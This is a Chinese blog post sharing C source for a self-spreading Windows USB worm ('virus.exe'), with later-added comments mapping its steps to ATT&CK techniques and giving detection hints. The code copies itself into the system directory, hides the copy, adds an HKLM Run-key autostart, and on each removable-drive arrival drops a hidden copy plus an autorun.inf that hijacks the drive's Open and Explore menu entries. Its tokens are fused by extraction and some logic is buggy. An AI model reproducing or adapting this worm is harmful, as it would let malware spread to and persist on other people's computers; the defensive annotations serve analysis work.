U disk virus
刺猬@/littlehedgehog
谨以此文送给刚哥,并预祝他在win32的道路上成功!
这篇代码还是去年写的了,本来这个学期还打算找时间把它加注下,呵呵,回头来看基本上都忘了。还是等到刚哥有时间加注吧,恐怕我以后很难再回到Windows平台了。
// 谨以此文送给刚哥,并预祝他在win32的道路上成功!
#include < windows.h >
#include < dbt.h >
#include < stdio.h >
#include < shlwapi.h >
#pragma comment(lib,"shlwapi.lib")
// Reviewer notes (defensive reading of this listing).
// The page's extraction has fused adjacent tokens (for example the return
// type and the function name), so the listing does not compile as printed.
// The code is left exactly as published; the comments describe what the
// visible calls do and what a defender would look for.
//
// Behaviours visible in this file, with the matching MITRE ATT&CK techniques:
//   - writes a value under the HKLM ...CurrentVersion/Run key   (T1547.001)
//   - copies itself to newly arrived volumes with an autorun.inf (T1091)
//   - marks the dropped files hidden + system                   (T1564.001)

// Presumably the timer identifier TIMER defined as 1 (tokens fused) - confirm.
#define TIMER1
// Forward declarations of the window procedure and the helpers defined below.
LRESULTCALLBACKWndProc(HWND,UINT,WPARAM,LPARAM);
BOOLGetSystemPath();
BOOLGetSelfPath();
BOOLCopyToSystemPath();
BOOLSetRegAutoRun();
BOOLSetAttributes(TCHAR * path);
VOIDRunOnCreate(HWND);
char DriveMark(ULONG);
VOIDOnDeviceChange(HWND,WPARAM,LPARAM);
VOIDCopyToUDiskPath();
VOIDSetDiscAutoRun();
// Global path buffers shared by the helpers:
//   g_szExePath    - filled by GetSelfPath() with the running module's path
//   g_szSysPath    - filled by GetSystemPath() with the system directory
//   g_szSysExePath - built by CopyToSystemPath(): system directory + file name
//   g_szUdisk      - two characters, drive letter and ':', set in OnDeviceChange();
//                    the array has no room for a terminating NUL
TCHARg_szExePath[MAX_PATH];
TCHARg_szSysPath[MAX_PATH];
TCHARg_szSysExePath[MAX_PATH];
TCHARg_szUdisk[ 2 ];
// File names used for the dropped copy and for the Run-key value name.
// g_szAutoRun is declared here but is not referenced by the code on this page.
TCHAR * g_szExeName = " virus.exe " ;
TCHAR * g_szAutoRun = " autorun.inf " ;
// Program entry point: registers a window class, creates one top-level window
// and pumps messages until WM_QUIT.
//
// All of the sample's behaviour is driven from WndProc (WM_CREATE,
// WM_DEVICECHANGE, WM_TIMER); this function only sets up the window that
// receives those messages.
//
// Returns 0 if RegisterClass fails, otherwise the wParam of the final message.
//
// Analyst note: the class name literal "HelloWin" is a static string in the
// binary and can serve as a weak triage indicator for this sample.
int WINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,
PSTRszCmdLine, int iCmdShow)
... {
staticTCHARszAppName[]=TEXT("HelloWin");
WNDCLASSwndclass;
// WS_EX_TRANSPARENT is an extended *window* style constant; here it is stored
// in the *class* style field.
wndclass.style=WS_EX_TRANSPARENT;
wndclass.lpfnWndProc=WndProc;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hInstance=hInstance;
wndclass.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndclass.hCursor=LoadCursor(NULL,IDC_ARROW);
wndclass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH);
wndclass.lpszMenuName=NULL;
wndclass.lpszClassName=szAppName;
if(!RegisterClass(&wndclass))
...{
MessageBox(NULL,TEXT("RegisterClassFail!"),
szAppName,MB_ICONERROR);
return0;
}
// The window is created with no title. WM_CREATE is delivered during this call,
// so RunOnCreate() runs before CreateWindow returns.
HWNDhwnd=CreateWindow(szAppName,
0,
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
NULL,
NULL,
hInstance,
NULL);
ShowWindow(hwnd,iCmdShow);
UpdateWindow(hwnd);
// Standard message loop; device-arrival broadcasts reach WndProc through here.
MSGmsg;
while(GetMessage(&msg,NULL,0,0))
...{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
returnmsg.wParam;
}
// Window procedure: dispatches the four messages the sample reacts to and
// forwards everything else to DefWindowProc.
//
//   WM_CREATE       - runs the install-or-monitor decision in RunOnCreate()
//   WM_DEVICECHANGE - handled by OnDeviceChange() (volume arrival)
//   WM_TIMER        - re-sends WM_DEVICECHANGE to this window with wParam and
//                     lParam both 0
//   WM_DESTROY      - stops the timer and posts WM_QUIT
//
// Returns 0 for WM_DESTROY, otherwise the DefWindowProc result.
LRESULTCALLBACKWndProc(HWNDhwnd,UINTmessage,WPARAMwParam,LPARAMlParam)
... {
switch(message)
...{
caseWM_CREATE:
RunOnCreate(hwnd);
break;
caseWM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam);
break;
caseWM_TIMER:
SendMessage(hwnd,WM_DEVICECHANGE,0,0);
break;
caseWM_DESTROY:
KillTimer(hwnd,TIMER);
// CloseHandle is called here with the window handle itself.
CloseHandle(hwnd);
PostQuitMessage(0);
return0;
default:
returnDefWindowProc(hwnd,message,wParam,lParam);
}
// Reached after the handled cases that end in break.
returnDefWindowProc(hwnd,message,wParam,lParam);
}
// Stores the Windows system directory in the global g_szSysPath.
// Returns the GetSystemDirectory result (a character count, 0 on failure)
// converted to BOOL.
BOOLGetSystemPath()
... {
returnGetSystemDirectory(g_szSysPath,MAX_PATH);
}
// Stores the full path of the running executable in the global g_szExePath
// (a NULL module handle means "the current process image").
// Returns the GetModuleFileName result (a character count, 0 on failure)
// converted to BOOL.
BOOLGetSelfPath()
... {
returnGetModuleFileName(NULL,g_szExePath,MAX_PATH);
}
// Builds g_szSysExePath as <system directory> + "/" + g_szExeName and copies
// the running executable there. The third CopyFile argument is FALSE, so an
// existing file at the destination is overwritten.
// Returns the CopyFile result.
//
// Defender notes: writing into the system directory normally requires
// administrative rights, so running as a standard user blocks this step.
// A new executable created in the system directory by a process started from
// a removable drive is a high-signal file-creation event (for example Sysmon
// Event ID 11).
BOOLCopyToSystemPath()
... {
lstrcpy(g_szSysExePath,g_szSysPath);
lstrcat(g_szSysExePath,"/");
lstrcat(g_szSysExePath,g_szExeName);
returnCopyFile(g_szExePath,g_szSysExePath,FALSE);
}
// Persistence step: opens the machine-wide Run key and sets a REG_SZ value
// named g_szExeName whose data is the dropped copy's path (g_szSysExePath).
// Returns TRUE only when both the open and the write succeed, FALSE otherwise.
// The key handle is closed only on that success path.
//
// Defender notes: this is the classic Run-key autostart (ATT&CK T1547.001).
// Writing under HKEY_LOCAL_MACHINE needs administrative rights, so least
// privilege blocks it. Registry value-set telemetry on this key (for example
// Sysmon Event ID 13) or an autostart inventory tool will show the new value.
BOOLSetRegAutoRun()
... {
HKEYhkey;
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE/MICROSOFT/Windows/CurrentVersion/Run",&hkey)==ERROR_SUCCESS)
...{
// The size argument is lstrlen() of the path, i.e. the length without the
// terminating NUL.
if(RegSetValueEx(hkey,g_szExeName,0,REG_SZ,(BYTE*)g_szSysExePath,lstrlen(g_szSysExePath))==ERROR_SUCCESS)
...{
RegCloseKey(hkey);
returnTRUE;
}
}
returnFALSE;
}
// Marks the file at `path` as SYSTEM and HIDDEN and returns the
// SetFileAttributes result.
//
// Defender note: with both attributes set, Explorer's default view does not
// list the file (ATT&CK T1564.001). Enumerating with hidden and protected
// operating-system files shown, or with `dir /a`, reveals it.
BOOLSetAttributes(TCHAR * path)
... {
returnSetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
// WM_CREATE handler: decides whether this instance is the installed copy or
// a fresh launch.
//
// It compares only the first character of the running executable's path with
// the first character of the system directory (presumably the drive letter -
// confirm).
//   - Same first character: starts an 8000 ms timer, and the process stays
//     resident to react to device-change messages.
//   - Different: copies itself to the system directory, hides the copy, adds
//     the Run-key value, launches the copy with a hidden window, and then
//     sends WM_DESTROY to its own window.
// None of the helper return values are checked.
//
// Defender note: the install branch produces a short, recognisable chain: an
// executable is written to the system directory, a Run value is set, and a
// child process is started with SW_HIDE by a parent that exits right after.
VOIDRunOnCreate(HWNDhwnd)
... {
GetSystemPath();
GetSelfPath();
if(g_szExePath[0]==g_szSysPath[0])
...{
SetTimer(hwnd,TIMER,8000,0);
}
else
...{
CopyToSystemPath();
SetAttributes(g_szSysExePath);
SetRegAutoRun();
WinExec(g_szSysExePath,SW_HIDE);
SendMessage(hwnd,WM_DESTROY,0,0);
}
}
// WM_DEVICECHANGE handler: on DBT_DEVICEARRIVAL for a volume device, records
// the new volume's drive letter in g_szUdisk and calls the two routines that
// write to that volume.
//
// lParam is cast to a device-broadcast header before wParam is examined; the
// header is only dereferenced inside the DBT_DEVICEARRIVAL case.
// Only dbch_devicetype is tested. dbcv_flags is not inspected, so the code
// does not distinguish between kinds of volume arrival.
//
// Defender note: the observable result is two file writes at the root of a
// volume within moments of it being mounted (ATT&CK T1091).
VOIDOnDeviceChange(HWNDhwnd,WPARAMwParam,LPARAMlParam)
... {
PDEV_BROADCAST_HDRpbdh=(PDEV_BROADCAST_HDR)lParam;
switch(wParam)
...{
caseDBT_DEVICEARRIVAL:
if(pbdh->dbch_devicetype==DBT_DEVTYP_VOLUME)
...{
DEV_BROADCAST_VOLUME*pdbv=(DEV_BROADCAST_VOLUME*)pbdh;
// dbcv_unitmask is a bit mask of drive letters; DriveMark() turns it into one letter.
g_szUdisk[0]=DriveMark(pdbv->dbcv_unitmask);
g_szUdisk[1]=':';
CopyToUDiskPath();
SetDiscAutoRun();
}
break;
}
}
// Converts a drive unit mask into a drive letter: scans bits 0..25 from the
// least significant end and returns 'A' plus the index of the first set bit.
// If several bits are set, only the lowest one is reported. If none of the
// low 26 bits is set, the loop ends with i == 26 and the return value is
// 'A' + 26, which is not a letter.
char DriveMark(ULONGunitmask)
... {
chari;
for(i=0;i<26;++i)
...{
if(unitmask&0x1)
break;
unitmask=unitmask>>1;
}
return(i+'A');
}
// Copies the running executable to the root of the volume named in g_szUdisk,
// under the name g_szExeName, then marks the copy SYSTEM and HIDDEN.
// An existing file of the same name is overwritten (CopyFile's third argument
// is FALSE). No return value is checked.
//
// g_szUdisk holds exactly two characters and is passed to lstrcpy as if it
// were a NUL-terminated string.
//
// Defender note: look for a hidden + system executable at the root of
// removable media. `dir /a` on the drive root lists it even when Explorer
// does not.
VOIDCopyToUDiskPath()
... {
TCHARt_szUDiscExePath[MAX_PATH];
lstrcpy(t_szUDiscExePath,g_szUdisk);
lstrcat(t_szUDiscExePath,"/");
lstrcat(t_szUDiscExePath,g_szExeName);
CopyFile(g_szExePath,t_szUDiscExePath,FALSE);
SetFileAttributes(t_szUDiscExePath,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
// Writes an autorun.inf at the root of the volume named in g_szUdisk.
//
// The text is assembled in a MAX_PATH-sized stack buffer with strcpy/strcat
// and no length checks. It contains an [autorun] section whose open and
// shell entries all name g_szExeName. The two Chinese menu captions read
// "Open (&O)" and "Explorer (&X)", so the entries are labelled like the
// drive's ordinary context-menu items.
// Any autorun.inf already on the volume has its attributes reset to NORMAL
// and is deleted before the new one is written. The new file is then marked
// SYSTEM | HIDDEN | READONLY.
//
// Defender notes:
//   - A hidden, system, read-only autorun.inf at a removable drive's root
//     that points at an executable in the same root is a strong indicator of
//     this family of worms.
//   - Windows 7 and later do not act on AutoRun open/shell entries for
//     non-optical removable media. On older systems AutoRun can be turned
//     off by policy (the NoDriveTypeAutoRun value under
//     Software\Microsoft\Windows\CurrentVersion\Policies\Explorer).
VOIDSetDiscAutoRun()
... {
FILE*fp;
chart_buffer[MAX_PATH];
chart_path[MAX_PATH];
// Both buffers are filled with the character '0' (0x30), not with NUL bytes;
// the strcpy calls below then write the terminators.
memset(t_buffer,'0',MAX_PATH);
memset(t_path,'0',MAX_PATH);
strcpy(t_buffer,"[autorun] open=");
strcat(t_buffer,g_szExeName);
strcat(t_buffer," shell/open=打开(&O) shell/open/Command=");
strcat(t_buffer,g_szExeName);
strcat(t_buffer," ");
strcat(t_buffer,"shell/open/Default=1 shell/explore=资源管理器(&X) shell/explore/Command=");
strcat(t_buffer,g_szExeName);
// Target path: <drive letter>: + "/" + "autorun.inf".
strcpy(t_path,g_szUdisk);
strcat(t_path,"/");
strcat(t_path,"autorun.inf");
// Replace whatever autorun.inf is already present on the volume.
if(PathFileExists(t_path))
...{
SetFileAttributes(t_path,FILE_ATTRIBUTE_NORMAL);
DeleteFile(t_path);
}
if(fp=fopen(t_path,"w+"))
...{
// strlen()+1 bytes are written, so the file ends with the NUL terminator.
fwrite(t_buffer,1,strlen(t_buffer)+1,fp);
}
// fclose runs whether or not fopen succeeded.
fclose(fp);
SetFileAttributes(t_path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY);
}